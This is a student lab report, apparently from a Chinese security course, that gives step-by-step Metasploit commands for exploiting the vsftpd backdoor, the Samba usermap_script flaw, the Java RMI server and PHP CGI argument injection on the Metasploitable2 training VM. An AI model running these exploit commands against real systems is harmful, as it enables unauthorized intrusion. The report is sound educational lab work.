# 20222309 2024-2025-1 《网络与系统攻防技术》实验六实验报告

news/2024/12/27 15:53:36/文章来源:https://www.cnblogs.com/zhengyq/p/18553440

1.实验内容

本实践目标是掌握metasploit的用法。
指导书参考Rapid7官网的指导教程。
https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/
下载官方靶机Metasploitable2,完成下面实验内容。
(1)前期渗透
①主机发现(可用Aux中的arp_sweep,search一下就可以use)
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③选做:也可以扫系统版本、漏洞等。
(2)Vsftpd源码包后门漏洞(21端口)
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
利用步骤:
在kali中执行msfconsole 启动metasploit
use exploit/unix/ftp/vsftpd_234_backdoor 选择漏洞
set RHOST XX.xx.xx.xx 设置要攻击的机器IP(靶机IP)
exploit/run 开始攻击
利用成功
执行uname –a、 pwd、 id等命令 验证
(3)SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
利用步骤:
use exploit/multi/samba/usermap_script 选择漏洞
set RHOST ip 设置要攻击的机器IP
exploit 开始攻击
利用成功 执行uname–a验证
(4)Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
操作步骤:
首先查看1099端口是否打开。
然后在MSF中:
use exploit/multi/misc/java_rmi_server
show options 查看配置参数
set RHOST (靶机IP)
exploit/run
sessions -i id
shell (进入meterpreter时,使用whoami验证下)
(5)PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
在kali中执行msfconsole,启动metasploit
msf > use exploit/multi/http/php_cgi_arg_injection 选择漏洞
set RHOST ip 设置要攻击的机器IP
exploit/run 开始攻击

2.实验过程

(1)前期渗透

①主机发现(可用Aux中的arp_sweep,search一下就可以use)
msfconsole启动控制台

search arp_sweep搜索模块

打开靶机查看ip地址

use 0选择模块,set rhosts 192.168.1.112设置参数,run开始攻击,查找到靶机

②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
使用Aux中的portscan/tcp,search portscan/tcp,use 0选择模块,set rhosts 192.168.1.112,set ports 1-65535设置参数

run开始攻击

③扫系统版本、漏洞等
search auxiliary/scanner/smb/smb_version、use 0、set RHOSTS 192.168.1.112、run

(2)Vsftpd源码包后门漏洞(21端口)

use exploit/unix/ftp/vsftpd_234_backdoor 选择模块set RHOST 192.168.1.112设置参数

run开始攻击输入uname -a,pwd,id,ifconfig验证

(3)SambaMS-RPC Shell命令注入漏洞(端口139)

use exploit/multi/samba/usermap_script 选择模块set RHOST 192.168.1.112设置参数,run开始攻击,使用uname -a,pwd,ifconfig

(4)Java RMI SERVER命令执行漏洞(1099端口)

use exploit/multi/misc/java_rmi_server选择模块set RHOST 192.168.1.112设置参数run开始攻击sessions -i 3进入任务,shell进入shell,whoami进行验证

(5)PHP CGI参数执行注入漏洞(80端口)

use exploit/multi/http/php_cgi_arg_injection,set RHOST ip 192.168.1.112,run开始攻击

3.问题及解决方案

  • 问题1:在最开始扫描的时候扫描不出靶机,ping靶机发现ping不通
  • 问题1解决方案:将靶机的网络适配器改为桥接

4.学习感悟、思考等

Metasploit 作为一款功能强大的渗透测试框架,其涵盖的众多模块和工具在本次实验中得以充分展现。通过实际操作,我对其漏洞扫描、漏洞利用、后渗透等核心功能有了更直观的感受。例如,在利用特定漏洞获取目标系统权限的过程中,我学会了如何精准地选择合适的漏洞利用模块,并根据目标系统的环境进行参数配置,以确保攻击的有效性。这不仅需要对 Metasploit 框架本身的熟悉,更需要对各种操作系统、网络服务以及常见漏洞类型有深入的理解。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/836337.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

如何在开源鸿蒙OpenHarmony开启SELinux模式?RK3566鸿蒙开发板演示

本文介绍开源鸿蒙OpenHarmony系统下,开启/关闭SELinux权限的方法,触觉智能Purple Pi OH鸿蒙开发板演示,已适配全新OpenHarmony5.0 Release系统!本文介绍在开源鸿蒙OpenHarmOony系统下,开启/关闭SELinux权限的方法,触觉智能Purple Pi OH鸿蒙开发板演示,搭载了瑞芯微RK356…

locust(服务器压测)

一: 注意事项:项目和压力机不能在同一台机器 二: 1.脚本压测 命令行:locust -f get.py --host=http:ip+host 注意事项Wait_time写0,0 不进行等待 1.脚本压测 2.1服务器防火墙需要关闭 2.2需要把打印去掉 2.3 Download Data 下载报告三.非web模式新版中 -u 指的是多少 用户/…

旺仔水饺-冲刺总结

1. 冲刺内容总结与反思 1.1 项目总结 本次冲刺阶段对项目的不足之处进行了相关改进: 针对团队沟通问题: 我们在本次冲刺阶段几乎是每天召开团队会议,包括沟通效率比较高的的站立会议;我们站立会议每次召开十分钟,尽量在这个十分钟之内大家都都把自己当前进行的的功能模块遇…

线程初见与线程管理

Chap1,2 Hello Concurrency与线程管理 参考书目:《C++ Concurrency in action》- By Anthony Willians, Second Edition 读书笔记 Contents定义并发,多线程 使用并发,多线程 简单的C++多线程1.1 什么是并发 1.1.1 计算机并发多核心:真正并行 单核心:时间片切换。1.1.2 并发…

人工智能之机器学习线代基础——线性相关和线性无关

线性相关(Linearly Dependent) 和 线性无关(Linearly Independent) 是线性代数中描述向量组关系的概念,用于判断向量组是否可以通过线性组合生成其他向量,以及它们是否包含冗余信息。

BurpSuite功能介绍

Burp Suite一共包含13个功能模块,它们帮助渗透测试人员更好地了解目标应用的整体状况、当前的工作涉及哪些目标、攻击面等信息。 Burp Suite Target主要包含站点地图、目标域、Target工具域并分析可能存在的漏洞。 Burp Suite Spider主要用于大型的应用系统测试,它能在很短时…

Jluosne的GNU Radio 频道的介绍

Jluosne的GUN Radio的频道 本频道主要发布有关GUN Radio有关的学习路径和学习资料,相关材料涉及到GUN Radio官方网站和优质的博文会进行refence mark。欢迎大家的关注和评论。 本频道的内容发布周期 非节假日为日刊,节假日休刊。不定期休刊,休刊会提前发布声明。 本频道的发…

2024-2025, 四大翻译工具加AI翻译的深度对比

在过去两年中,人工智能技术的迅猛发展对翻译工具产生了深远的影响。本期特意挑选了四款翻译工具以及一个AI翻译工具,对其性能进行评测,看看在AI技术的加持下,它们的质量提升如何。前言 在过去两年中,人工智能技术的迅猛发展对翻译工具产生了深远的影响。 本期特意挑选了四…

vue2-组件化编程

模块:向外提供特定功能的js呈现 组件:用来实现局部(特定)功能效果的代码集合 模块化:当应用中的 js 都以模块来编写的, 那这个应用就是一个模块化的应用 组件化:当应用中的功能都是多组件的方式来编写的, 那这个应用就是一个组件化的应用编写组件-非单文件组件非单文件组件:一个…

实验4 类的组合、继承、模板类、标准库

任务2 源码:1 #include <iostream>2 #include <vector>3 #include <string>4 #include <algorithm>5 #include <numeric>6 #include <iomanip>7 8 using std::vector;9 using std::string;10 using std::cin;11 using std::cout;12 using…

人工智能之机器学习线代基础——行列式、矩阵的 逆(inverse)、伴随矩阵

行列式(Determinant) 是线性代数中的一个重要概念,用于描述方阵的一些性质。行列式是一个标量,计算方法和矩阵的大小有关。 不使用代数余子式的定义 不使用代数余子式的定义的三阶计算案例 矩阵的 逆(inverse) 伴随矩阵